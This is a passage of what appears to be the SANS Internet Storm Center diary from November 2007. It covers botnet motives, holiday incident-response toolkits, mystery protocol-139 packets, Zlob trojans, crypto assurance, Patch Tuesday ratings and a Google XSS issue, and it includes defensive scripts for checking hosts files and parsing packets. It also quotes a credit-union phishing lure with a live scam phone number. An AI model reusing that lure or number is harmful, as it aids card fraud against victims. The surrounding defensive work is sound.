CPU: botnets often use their slave machines to send email, proxy web traffic, and launch denial of service attacks. These all use slices of CPU on the machine to do work that they would otherwise not have the resources to do.

Memory: User’s browsing habits, username/password credentials, and other sensitive user data is captured out of memory.

Hard Drive: I have seen bot-nets that perform no other service than act as a giant library to store pirated films and audio.

Internet access/IP address: every new IP that isn't already on a blocklist is of interest to spammers. Criminals can host malicious websites on a machine to avoid other blocklists. Criminals can proxy their traffic through a machine to hide their true location and to get around companies' firewalls blocking known-bad IPs.

What about User Data?

Everyone knows that criminals are interested in your banking and paypal credentials. They are also after your eBay passwords so they can sell stolen goods in your name. They are after your facebook, and myspace credentials so they can post links to malicious websites (look at Dancho Danchev's post today for an example.) They’re after your email address. Even by itself a working email address is worth money. Take a person’s address book and you get their social network that can be used to launch targeted email attacks. Your email address is often used as your account name on a number of web services. It’s arguable that you can correlate more about a person based on their email address than their Social Security Number anymore.

Executive Summary

So you may think there is nothing of interest on your machine, but there are certainly things of value on your system. Criminals know how to “make it up in volume.”

1 Comments

Published: 2007-11-20

Holiday/Family Incident Response

Why and How

Apologies in advance that this is Windows-centric.

Many of us are going to visiting with friends and family over the next couple of months while celebrating a number of year-end holidays.  Often, we are tapped for on-site tech-support duty in exchange for holiday treats.

Yesterday George posted a request for what's in your holiday/family incident response toolkit.  Overnight I collected the responses in the hope of presenting a useful and organized list.

Incident response under these conditions can be way harder than what one encounters at their day-job.  The builds are non-standard, there are rarely backups to rely on, the data are irreplaceable (personal financial data, photographs, genealogical project, etc.)  The stakes are often higher.

The response methodology is similar to what you'd run into at work:

  • Preparation
  • Detection/Identification
  • Containment/Eradication
  • Lessons Learned/Prevention

Preparation

Hopefully that was done last year when you put on AV, firewalls, and anti-spyware.  This year, the root-kit detection tools are more widely available, so it's a good time to update your jump-kit and your framework.

Detection/Identification

The first step is an interview with the machine user.  You should ask things like:

  • "Have you patched recently?"
  • "Is the machine running slowly?"
  • "Getting a lot of pop-ups?"

Follow the interview with an inspection to verify that the AV is present, running, and up-to-date.  Ensure that the OS is fully patched.  Peek at the hosts file.  See if there is reason to suspect that the machine is compromised before you start tearing into it.

Containment/Eradication

Should you determine that the machine has been compromised, it is time to start backing up the important files off of the machine.  The only sure approach to cleaning a system is to rebuild it.  There were many spyware/virus cleaning tools submitted, but I consider them useful only in the Identification phase to determine if the machine has been compromised.  I personally do not recommend them for reliable system cleanup.

Lessons Learned/Prevention

If the system was properly secured last time, and no ill has come of it, then congratulations.  But your work is not over.  This final stage is the most important stage in incident response.  Go over what you found in your investigation, point it out, and provide a solution.  No anti-virus?  Put one on.  No backups?  Make one.  Firewall not enabled?  Enable it.  This is the point where you provide additional instructions, set up an ongoing tech-support option (if you're brave/generous enough), and suggest alternatives (say, move them from IE7 to Opera or Firefox -- which have their own issues, so you have to carefully consider the consequences of that).
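As an added example (not from the diary or from any of the submitted tools), the following Python script does the hosts-file peek from the Detection/Identification step: it parses a hosts file, flags entries that point update or security-vendor sites anywhere at all (loopback or an outside address), and lists addresses that many names have been mapped to. The sample hosts content and the list of protected domains are constructed for this example.

```python
import ipaddress
from collections import defaultdict

# Constructed sample in the format of a Windows hosts file
# (%SystemRoot%\System32\drivers\etc\hosts). The entries after the printer imitate a
# hijack seen on infected home PCs: update and security-vendor sites pinned to an
# address the attacker controls, so the machine can no longer update or scan.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
192.168.1.20    printer.home      # legitimate LAN entry
203.0.113.7     update.microsoft.com
203.0.113.7     www.microsoft.com
203.0.113.7     www.symantec.com    liveupdate.symantec.com
127.0.0.1       www.mcafee.com
"""

# Illustrative list of domains a malware author has every reason to block; extend it
# with whatever AV/update sites the family's PC actually depends on.
PROTECTED_SUFFIXES = (
    "microsoft.com", "windowsupdate.com", "symantec.com", "mcafee.com",
    "sophos.com", "kaspersky.com", "trendmicro.com", "avast.com", "avg.com",
)

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def parse_hosts(text):
    """Return (ip, hostname, line_no) tuples; comments and blank lines are skipped."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                              # malformed line: ignore in this example
        for name in fields[1:]:
            entries.append((ip, name.lower(), line_no))
    return entries


def is_protected(name):
    return any(name == s or name.endswith("." + s) for s in PROTECTED_SUFFIXES)


def suspicious_entries(text):
    """Flag protected domains mapped anywhere at all: to loopback they are silently
    blackholed (updates just 'fail'), to anything else they are redirected."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name == "localhost" or not is_protected(name):
            continue
        reason = "blackholed to loopback" if ip in LOOPBACK else "redirected to %s" % ip
        findings.append((line_no, name, reason))
    return findings


def crowded_addresses(text, min_names=3):
    """Non-loopback addresses that many names resolve to: typical of a bulk hijack."""
    by_ip = defaultdict(set)
    for ip, name, _ in parse_hosts(text):
        if ip not in LOOPBACK:
            by_ip[str(ip)].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) >= min_names}


if __name__ == "__main__":
    for line_no, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print("line %d: %s %s" % (line_no, name, reason))
    for ip, names in crowded_addresses(SAMPLE_HOSTS).items():
        print("%s is mapped to %d names: %s" % (ip, len(names), ", ".join(names)))
```

To run it against a real machine, read the hosts file into `text` instead of `SAMPLE_HOSTS`; a clean Windows hosts file has nothing but comments and the localhost line.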

The Tools

I broke the tools down into the following categories:

  • Frameworks - how one deploys the tools to the system
  • Anti-Virus
  • Anti-Spyware
  • Anti-Rootkit
  • Backup
  • System Analysis
  • Malware Analysis - a subset of System Analysis tools focused on analyzing the malware
  • Network Analysis
  • Registry Cleanup
  • Remote Support
  • Patching
  • Browser protection

CD vs. USB

How should you transport your tools to the site?  There are a lot of good arguments supporting the use of burned CDs and USB drives. 

CD pros:

  • Inexpensive
  • You can leave copies behind for them to use
  • It's hard to infect them

CD Cons:

  • Capacity - a trade-off can be made between capacity and expense by switching to DVD

USB pros:

  • Capacity
  • Flexibility - you can write to them
  • Make nice gifts

USB cons:

  • Risky, if you don't write protect them
  • Costlier than CD/DVD media

Frameworks

Of course one can simply run from the CD or USB on the live system.  In some cases this is the best first step, especially if you suspect something like a botnet running on the system.  Live incident response can quickly identify that the machine is compromised and provide you with the code that's causing the traffic right away (see below for the System Analysis tools one can use in these cases.) 

Others prefer to work from a boot-disk when analyzing a system, particularly when a root-kit is suspected.  These came in two varieties, Windows-based and Linux-based.

In the Windows-based options, people recommended:

For Linux-based options try:

Anti-Virus

These tools can be used for an initial assessment of the system.  One (or more) of these should be left installed on the system when you leave.  There are plenty of great commercial solutions.  I'm only listing free solutions today:

Anti-Spyware

Like anti-virus tools, these play a role in initial assessment of the system, and should be installed on the system when you leave it for added protection.

Anti-Rootkit

We did not have a lot of these tools last year.  They may turn up things that aren't showing up in your other scans.

The guys over at RaDaJo (RAul, DAvid and JOrge) Security Blog have an article inspired by George's post featuring Anti-Rootkit tools: http://radajo.blogspot.com/2007/11/anti-rootkit-windows-tools-searching.html.

Backups

Burning a copy of irreplaceable photos and other documents to CD/DVD is time well spent, regardless of whether the system is compromised and needs to be reinstalled or not. They will likely not regret the time put into this important defense measure. Reader Robert suggests that you can avoid a lot of drag-and-drop effort by using Areca (http://areca.sourceforge.net/).

System Analysis

There is a tremendous number of little programs that can give you an eye into what is going on in the system.  These are used during the live response stage of your Holiday/Family incident response.  HijackThis was the overwhelming favorite, followed by huge support for the Sysinternals tools.

Use of these tools can occupy a lot of your time and require a fair amount of experience.  Russ has offered a helpful write up for a Rapid Malware Response/Analysis process (http://holisticinfosec.org/publications/MalcodeAnalysisTechniquesForIH_McRee.pdf.)

Malware Analysis

These tools were offered up to take a closer look at the malware that has been found on the system.  Using these requires a larger investment of time than many people have while visiting.  But for future use, these tools might be handy to have on your own incident response toolkit.

Network Analysis

It is sometimes easier to determine if a system is compromised by looking at the network traffic leaving the system, especially if you're familiar with protocol analysis.  Commonly suggested tools were:

Registry Cleanup

A few tools were submitted that promise to clean up the registry and other system files to improve system performance.

Remote Support

Some brave and generous people offer remote tech support to their families.  They have recommended:

  • LogMeIn
  • PCAnywhere
  • VNC

It is not something that I would recommend or personally do.  For selfish reasons, I don't look forward to late night tech support phone calls from Aunt Minnie.  Nor do I like opening up a remote control panel on a machine that I'm trying to protect.

Patching Support

This was the focus of last year's post (how to get all of the updates for Grandma's PC together).  The Offline-Update project (http://www.heise.de/ct/projekte/offlineupdate/download_uk.shtml) promises to solve the problem of building your own CD or USB to patch your relatives' machines that have only dial-up connections to the internet.  But what about all of those applications on the system?  Attacks are moving from OS vulnerabilities to leveraging vulnerabilities in applications like audio players and PDF readers.  Secunia offers a program that can inventory and assess the applications installed on the system.  Details are available at: https://psi.secunia.com/.

Browser Protection

Many submissions suggested that they move the user from using IE over to Firefox or Opera.  Also, they suggested using McAfee's Siteadvisor (http://www.siteadvisor.com/) and Netcraft's Toolbar (http://toolbar.netcraft.com/.)

Other protection methods


Kevin Liston (kliston at isc dot sans dot org)

0 Comments

Published: 2007-11-20

Mystery Packets, Protocol 139

I am just on vacation at my parents' place, and while doing some network maintenance, I came across these two mystery packets:

17:07:17.405771 IP 192.168.178.255 > 255.255.255.255:  ip-proto-139 30
	0x0000:  4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
	0x0010:  ffff ffff 0100 0200 0000 0000 0000 0000  ................
	0x0020:  0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a  ........l@....8*
	0x0030:  ab63                                     .c
17:07:17.406835 IP 192.168.178.255 > 255.255.255.255:  ip-proto-139 30
	0x0000:  4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
	0x0010:  ffff ffff 0100 0100 0000 0000 0000 0000  ................
	0x0020:  0000 1b3c 90a3 4ac1 50b7 930a b723 a181  ...<..J.P....#..
	0x0030:  431a                                     C.

A bit about the network: 3 PCs, 2 Macs running Leopard. Each Mac runs VMware with Windows XP. All the PCs run Windows XP. There is a "FritzBox" DSL router. Part of the network is wireless. Other than that, there isn't that much special about the network. The hosts run firewalls which are pretty much open locally.

No idea so far why these packets show up. Kind of looks like they are corrupted netbios packets (port 139 > protocol 139?). But why broadcast like this? Please let us know if you have any ideas.

-----
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
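As an added example (not part of the diary), this Python script parses the two dumps printed above: it decodes the IPv4 header fields, recomputes the RFC 791 header checksum and lists the observations a handler would note, such as that tcpdump's "ip-proto-139" is the IP protocol field, not TCP port 139. The source-address check assumes the network is a /24.

```python
import struct
from ipaddress import ip_address

# The two hex dumps from the diary, re-typed as the input for this example
# (bytes only, without tcpdump's offset and ASCII columns).
PACKET_1 = bytes.fromhex(
    "4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff"
    "ffff ffff 0100 0200 0000 0000 0000 0000"
    "0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a"
    "ab63"
)
PACKET_2 = bytes.fromhex(
    "4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff"
    "ffff ffff 0100 0100 0000 0000 0000 0000"
    "0000 1b3c 90a3 4ac1 50b7 930a b723 a181"
    "431a"
)

# Fixed 20-byte IPv4 header, network byte order (RFC 791).
IP_HEADER = struct.Struct("!BBHHHBBH4s4s")


def ipv4_checksum(header):
    """One's-complement sum of 16-bit words, folded and complemented."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4(packet):
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, stored_sum,
     src, dst) = IP_HEADER.unpack_from(packet)
    ihl = (ver_ihl & 0x0F) * 4
    header = bytearray(packet[:ihl])
    header[10:12] = b"\x00\x00"          # the checksum is computed with its own field zeroed
    computed = ipv4_checksum(bytes(header))
    return {
        "version": ver_ihl >> 4,
        "header_len": ihl,
        "total_len": total_len,
        "id": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "ttl": ttl,
        "protocol": proto,
        "stored_checksum": stored_sum,
        "computed_checksum": computed,
        "checksum_ok": stored_sum == computed,
        "src": str(ip_address(src)),
        "dst": str(ip_address(dst)),
        "payload": packet[ihl:total_len],
    }


def triage(packet):
    """Return (fields, notes): the things a handler would write down about the packet."""
    f = parse_ipv4(packet)
    notes = []
    if f["protocol"] not in (1, 6, 17):
        notes.append("IP protocol %d is not ICMP/TCP/UDP; 'ip-proto-%d' names this header "
                     "field, not a TCP/UDP port" % (f["protocol"], f["protocol"]))
    if not f["checksum_ok"]:
        notes.append("header checksum 0x%04x does not match computed 0x%04x"
                     % (f["stored_checksum"], f["computed_checksum"]))
    if f["dst"] == "255.255.255.255":
        notes.append("limited-broadcast destination")
    if f["src"].endswith(".255"):
        notes.append("source looks like the directed-broadcast address (assuming a /24)")
    if len(f["payload"]) != f["total_len"] - f["header_len"]:
        notes.append("payload is truncated in the capture")
    return f, notes


if __name__ == "__main__":
    for label, pkt in (("packet 1", PACKET_1), ("packet 2", PACKET_2)):
        fields, notes = triage(pkt)
        print("%s: %s > %s proto %d ttl %d id %d, %d payload bytes"
              % (label, fields["src"], fields["dst"], fields["protocol"],
                 fields["ttl"], fields["id"], len(fields["payload"])))
        for n in notes:
            print("  -", n)
```

Both dumps carry the same stored checksum, 0x8c57, although their ID fields differ, so at least one of them cannot be a correctly formed header; running the script shows that neither verifies, which fits the "corrupted" hypothesis.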

0 Comments

Published: 2007-11-20

Guest Editorial: Internet Governance Forum (Gadi Evron)

From time to time, we will allow non handlers to submit editorials to be published in our diary. The editorial below was submitted by Gadi Evron. If you are interested, please send a quick proposal via our contact form.

The IGF (Internet Governance Forum) is an annual UN conference on Internet governance which was held this year in Rio de Janeiro, Brazil. The topics discussed range from human rights online to providing Internet access in developing countries. A somewhat secondary topic of conversation is Internet security and cyber-crime mostly limited to policy and legislative efforts. Techies and our industry don't have much to do there, but I have a few updates for us from the conference.

One of the main problems the Internet security operations community faces is that although global encompassing incident response and information sharing is happening, it is on the technological and operational levels. We mostly do not know how to communicate with the policy makers. Some of us present there made head-way in the hallways (as the sessions are mostly just repeated talk).

I spoke with Dr Hamadoun Touré, the Secretary General of the ITU on some of our efforts and some of our operational needs, and was pleased to find an open mind and sincere interest. The ITU, at least as far as I understood, is concerned with Internet security, and appreciates the importance of the operational communities and the work we do.

On a surprising note, China ran a few security sessions in which its delegates showed high visibility into Internet security and abuse in China, speaking of issues of establishing trust and of incident response statistics. They are highly concerned with spam, and were the only ones to have spoken in an operational manner. They quoted numbers from (mainly) US sources that showed spam and abuse activity in China, then indicated a drop in spam being sent from the Chinese network (spam is of key importance to them in their presentations).

On the other hand they presented an increase in phishing and botnet incidents being reported. In one slide they showed numbers on phishing reports, sorted by top-reporters. The top-5 reporters were: Verisign (probably iDefense), RSA (probably Cyota), eBay (probably eBay), CastleCops (Probably PIRT) and MarkMonitor.

But wait, there's more. The Chinese delegation also discussed mitigation success rates. In phishing, out of over 600 sites reported in one time period they mitigated just over 200. They were sincere and open on where they have to get better and, to be honest, I was in awe of them, a country I considered to be a black hole of abuse reports. We made some new contacts and hope these will prove fruitful for future cooperation. I am highly impressed with the people I met from China.

Another subject of interest to me was my discussion with Milton Mueller on his advocacy of some information being removed from publicly accessible WHOIS data. Although ideologically I am with him on this privacy issue, practically it is the only, granted very poor, way for the Internet security operations community to take down abusive domain names today, through registrars, and the Internet can't do without it until another option is presented. I hope to work with him on solutions to this conundrum.

My lecture there was one I only found out I was giving about a month ago, after being contacted by a member of ICANN's SSAC. It was a part of the Case Studies session from the Diplo foundation ( http://www.diplomacy.edu ), where I spoke, technically, of lessons from the Estonian Internet war and how countries can defend themselves, as written in the post-mortem analysis and recommendations I wrote for the Estonian CERT. In the questions section we spoke of the importance of CERT organizations, how they are established and on the differences in fraud as seen in different parts of the world. My fellow session members were: Robert Guerra (Canada, session moderator), Veronica Cretu (Moldova, facilitator), and the other panelists: Olga Cavalli (Argentina) and Cristine Hoepers (who manages the Brazilian CERT). I, of course, am from Israel and work for Afilias Global Registry Services.

Gadi Evron,
ge@linuxbox.org.

0 Comments

Published: 2007-11-19

The Holidays Cometh

Robert posed a question to the handlers that I think everyone should weigh in on :

"It is becoming time for the holidays. That means geeks spending time with families. That means geeks need to pack tools for malware cleanup. Do you guys have a CD list of tools and or procedures? This might be worth making a post about."

Being somewhat cloistered in my job, and having a couple of young advocates at home (my 14 y.o. installed her own stripped-down *nix on her laptop, the 11 y.o. asked for help with his) I don't get to stay on top of the latest Windows and Mac malware detect/remove/recover tools. As a result, while my personal faves are useful to me, they'll no doubt seem too slow/dumb/technical/esoteric/2004 for others.

What is in your holiday jump bag? Let us know at https://isc2.sans.org/contact.html and we'll post the most popular response essentials.

Cheers!
g

1 Comments

Published: 2007-11-18

Overzlobbed

Tomorrow, it will be a year since we first ran an analysis of the ZLOB family of trojans in the ISC diary.  The write-up from back then is still an interesting read. While investigating today a few .edu sites with links to the latest ZLOB variant, it occurred to me how different these pages were compared to one year ago:  Yes, there was obfuscation of JavaScript. But not too much - certainly not enough to cause any virus scanner to reject the page outright. Yes, there were the sleazy links, thousands of them, interlinking the pages to cause a good ranking in search engines. But there were none (none!) of the embedded IFRAMES with the latest collection of browser- and application exploits that such pages used to contain in the past, Zlob or not.

Thinking it over, this sort of makes sense: if you want to trick a user into (voluntarily!) downloading and installing a piece of malware that claims to be a video codec, you probably don't want to scare the user away from the sites that draw him into the spyderweb by having other malware or exploit attempts lighting up the user's anti-virus.  The Zlob approach of propagating malware seems to have been quite successful for the bad guys: Not only are they still "going strong" more than a year after the first report, they also branched out to include Mac-OSX (diary) earlier this month.

Since the "codec" binaries change frequently and AV coverage is notoriously poor, probably the best defense in a corporate environment is to have a web filter in place that blocks access to porn pages. What used to be seen as a mere "compliance" measure to not run afoul of sexual harassment rules at the workplace has long since turned into a cornerstone of most companies' malware defense.

0 Comments

Published: 2007-11-17

Architecture, security and assurance

Kind of following on from Swa's post from yesterday.   When we go to a banking website we check for the little padlock, when we send a confidential communication we encrypt it.  Much of the internet now is dependent on strong encryption.  Ecommerce relies on solid encryption, as do governments, businesses, etc.  So what if encryption goes bad?  Well, at best people laugh at you (remember CSS) at worst national security is compromised, or your company’s reputation is shot to pieces.

Craig (thanks) wrote in with an observation that set me thinking. 

I don’t think there is a single place in a computing system where the architecture and implementation have more critical impact than in the implementation of cryptographic systems.

We all know that if the key is compromised, the game is over.   We also tend to think “I’m using AES-256, so everything should be sweet”, but not all of us think about the rest of the system.  For example, the pseudo-random number generator (PRNG) issue on Windows that Swa talked about yesterday shows that if things aren’t quite as random as you’d hoped, or access can be gained, then things go awry and using a strong algorithm means nothing.

As Craig writes

just because your pieces fit and operate as a cryptographic system, doesn’t mean that you put them together in a way that makes the cryptographic system secure

Now governments typically have recognised this issue.  Many will state that unless the cryptographic product has been fully examined by them, as a government agency, you are not permitted to use it to transmit anything sensitive.   

If the architecture that delivers the cryptographic services has not been evaluated, then even if it uses a recognised strong algorithm it may still be used, but only for limited purposes.   To me it shows that there are governments that have recognised that the way something is put together is very important.   This is one area where business needs to catch up.  You often hear the words “but it uses insert favourite algorithm here”.  In the world today we may need something more.

Common Criteria

So how do you get some of this assurance that a product is put together in a secure manner?  Many organisations and governments look at products that have been evaluated.   Typically this is now under a scheme called Common Criteria (CC) (old timers will remember the Orange Book as well).  One of the things to look out for is the Security Target of the device/software being evaluated.   For example there are some firewalls on the list whose Security Target does not include the VPN or encrypting capabilities.  So the firewalling capabilities have been verified, but the encryption functions have not.   If you are a business, then this may still be OK to use, but if you are a government agency, it may mean that you will have to purchase a separate product to provide VPN connectivity for remote users.

The devices also need to be configured in line with the Security Target and the Certification report in order to be able to comply.  Over time there have been examples where a product is rated as a secure product, but only if you don’t connect it to a network (yes it was a product that provides network functionality).   Again government bodies typically have to pay attention to this, business less so, but it is always good to know what has been evaluated and what has not.  Also don’t forget that not all versions of the same product will be evaluated.  It can be an expensive process so vendors may only have major new versions evaluated.

So next time a vendor (sorry guys) tells you "this product is rated EAL something", you may want to ask for the relevant certification report and Security Target and have a good read.  An evaluation is not everything, but it is still better than nothing.

Cheers

Mark H - Shearwater

0 Comments

Published: 2007-11-16

'Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin.'

The title is actually a quote from John von Neumann. And while it's over half a century old, it is still indicative of the difficulty faced by those who are forced to generate random data.

When I teach a certain awareness course for developers, one of the basic messages is not to try to reinvent crypto components, but to use proven good ones. Basically, it's just way too hard for the mere mortals among us to get it perfectly right.

In crypto you basically have 4 basic building blocks: the symmetric and asymmetric ciphers, the hash functions and the (pseudo) random number generator. With those, you can build whatever you need.

Lately the random number generator in Windows seems to be under scrutiny. Basically some crypto researchers are calling it broken, and the press reports that Microsoft mostly seems to deny it's a problem.

While it's rather easy to make fun of Microsoft in this, take a look at what Microsoft employees write about PRNGs and the NIST recommendation: http://rump2007.cr.yp.to/15-shumow.pdf.

The viewpoints:

  • The research paper: http://eprint.iacr.org/2007/419.pdf
  • Microsoft doesn't seem to have a public statement, but their position boils down to:
    • There is no security vulnerability as the information is not leaked.
    • The information is actually only released locally to authorized users. E.g. Administrators have wide rights.
    • They encourage users to run with limited user rights.
    • They seem to be ready for what they call defense in depth (inside one machine) and to reevaluate the strength of their PRNG.
      [If a Microsoft spokesperson wants to send me quotable material, feel free ...]

Still security professionals will need to position themselves on the issue in the long run.

What do you think about it, why?  Let us know and we'll summarize the best replies we get.

--
Swa Frantzen

0 Comments

Published: 2007-11-16

Tiger and Leopard upgrades

In the last few days Apple released upgrades to its Tiger (10.4) and Leopard (10.5) versions of OS X.

For those unfamiliar with Mac OS X: this isn't just security patches, it is somewhat comparable to what Microsoft calls a service pack. As such it can include stability fixes, features, etc. as well as security fixes.

10.4.11 includes a long list of security fixes. Since it's an all-or-nothing deal, there's very little real use in discussing all of them individually. Just take the plunge: there are a few bad ones in there, so you'll need it anyway. Some readers wrote us that there might be some issues with it all, so be careful. That said, I'm running it for a bit already and have not seen a single bad thing so far.

10.5.1 includes some security fixes too, all centered around the application firewall:

Apple also released patches for the beta of safari, but hey, it's beta software!

--
Swa Frantzen

0 Comments

Published: 2007-11-15

Incident Handling 101

Every day we see new exploits and old, patches and vulnerabilities, DOS and DDOS.  As the newest member of the Internet Storm Center, I am in data gathering mode.  Even though I have been a GCIH (#50) since 2000, we as handlers have to start learning the incident handling process all over again every time we join a new team.  As a new handler, my question was where is the contact list?  The first step in the Incident Handling process is preparation, so let’s do it.  Let’s get this list updated.

By the way, if you need to know how to prepare for an incident, SANS has great Incident Handling Forms as a part of SCORE (Security Consensus Operational Readiness Evaluation).  SCORE is “dedicated to providing a community consensus minimum standard of procedures, and checklists for overall infrastructure security."  There is no need to reinvent the wheel, so check out the forms and prepare your team for an incident.

So we ask, if you are on a CIRT team and would like for us to have your team’s contact information in case we see activity you should know about, please send it to us on our contact page.  We look forward to hearing from you.

Fair Winds, Mari

0 Comments

Published: 2007-11-14

Miscellaneous items

Nothing really major happening today, so here are a couple of quick items:

  • Many security fixes released by Apple today for OS X and Safari on Windows.
  • There is more fallout from the salesforce.com breach.  This time phishing emails were sent to recipients from the supposed "Canadian Revenue Service" (Canada tax agency).
  • There is a fake Microsoft Security Update bulletin going around that looks pretty real.  They seem to be customized with the recipient's full name.  There is a link to malicious EXE files proclaiming to be the patch installer.

0 Comments

Published: 2007-11-14

New version of cvtwin, now with HTTP upload

First of all: if you are currently submitting data to DShield, and everything works right: Don't touch it ;-)

Historically, data was submitted to DShield via e-mail. I chose this method way back (Nov. 2000) as it provided easy load balancing and queuing in case the main database server was under heavy load. Initially, we only had a Linux client, and of course it's trivial to send e-mail from almost any Linux host. The first client was actually a 1 line shell script.

I think e-mail is still a good idea, but we are having more and more issues getting e-mail to us. In particular our Windows client, cvtwin, uses an external simple command line client which isn't always that easy to configure, as ISPs block port 25 and require users to log in to mail servers.

So earlier today, Wayne, our "cvtwin guy", added a new function: It will now submit data via HTTP as well as SMTP. I think in particular in Windows scenarios this makes a lot of sense. Most of our windows users are home users. They run some kind of logging software on a work station and submit logs collected by this software. These systems are used for web browsing and usually have unobstructed access to port 80.

So if you have issues running CVTWIN because you are not able to send mail, give the new version a try. And again: If it works, don't touch it ;-)

More details about CVTWIN: Windows Clients
Changelog (use for now for documentation of the http feature)

This is an experimental release at this point. Please report issues to info@dshield.org.

0 Comments

Published: 2007-11-13

november black tuesday overview

Overview of the November 2007 Microsoft patches and their status.

MS07-061: An input validation failure allows remote code execution. Replaces MS06-045.
  Affected: Windows shell - exposed via IE7, Skype, Acrobat, ...
  References: CVE-2007-3896, KB 943460
  Contra indications: none listed
  Known exploits: Well known problem, exploit in the wild
  Microsoft rating: Critical
  ISC rating(*): clients PATCH NOW, servers Important

MS07-062: Lack of entropy in pseudo-random number generation results in weak transaction IDs and therefore in DNS spoofing vulnerabilities. DNS spoofing can lead to man-in-the-middle attacks and more. Replaces MS07-029.
  Affected: Windows
  References: CVE-2007-3898, KB 941672
  Contra indications: none listed
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating(*): clients Critical, servers Critical(**)

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**): Assuming DNS does have a critical role on the system.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-11-13

phone phish twist

Mike sent us an interesting twist on a phishing scheme. The victim receives a message from a credit union whose name is associated with the victim receiving the email, and it asks them to call the credit union on a provided phone number.

It's well targeted, so we're obfuscating the parts that identify the victim all too easily:

Due to unusual levels of fraud we have had to suspend any future authorizations being conducted with your VISA Check Card in Mexico and United States. If you want this restriction to be removed from your accont please call us immediately. 

Call (877) 228-0944 to have this restriction removed.

We apologize for any inconvenience this may cause.

© Copyright 2007 ****** Credit Union.

From an awareness point of view to your customers/users/... the key message here is to:

  • not only teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
  • but also tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)

We've checked out the phone number itself. When doing this, make sure calls to scam artists don't get traced back to you; they tend to become aggressive every so often. It seems this number is used more widely in scams like these: http://800notes.com/Phone.aspx/1-877-228-0944.

One of the fellow US based handlers called the number to validate it's not a joe-job to discredit a real institution.  He found it's an automated system on the other side and it indeed asks credit card numbers, PIN, expiration date etc. It'll also tell you your card is now activated (read: if you entered valid data they will now use your card actively). Interestingly it doesn't identify the institution it's supposedly working for.

--
Swa Frantzen

0 Comments

Published: 2007-11-12

WSUS issues?

We've received several reports this morning of folks getting SQL errors from WSUS after synchronizing.  The error suggests some sort of problem in the new product metadata.  One report suggested it might be US only, but some forum postings elsewhere suggest that it might be hitting the UK, too, so I wouldn't count on it being limited geographically.  We've pinged our Microsoft contacts, but not heard back from them yet.  We'll update as more info becomes available.  Thanx to Mark and Dennis for bringing this to our attention.

References:

0 Comments

Published: 2007-11-11

Google XSS

Juha-Matti reminded us of a new Google cross-site scripting issue related to a recent JAR: protocol vulnerability in Firefox that was reported by Petko D Petkov on Saturday:

http://www.gnucitizen.org/blog/severe-xss-in-google-and-others-due-to-the-jar-protocol-issues

References:

http://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues

http://www.securityfocus.com/bid/26385

http://secunia.com/advisories/27605/

http://www.kb.cert.org/vuls/id/715737

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2007-11-11

Cyber Jihad? Yeah, right...

In the news this past week were the ominous stories about a Cyber Jihad on November 11th.  OK terrorists, it's November 11th and we haven't seen your little Jihad yet.  As Johannes said in his diary a few days ago, it seems to have been called off.  What happened?  If there are any terrorists hanging out here reading this diary I'd like to hear from you.  Please use our contact page.

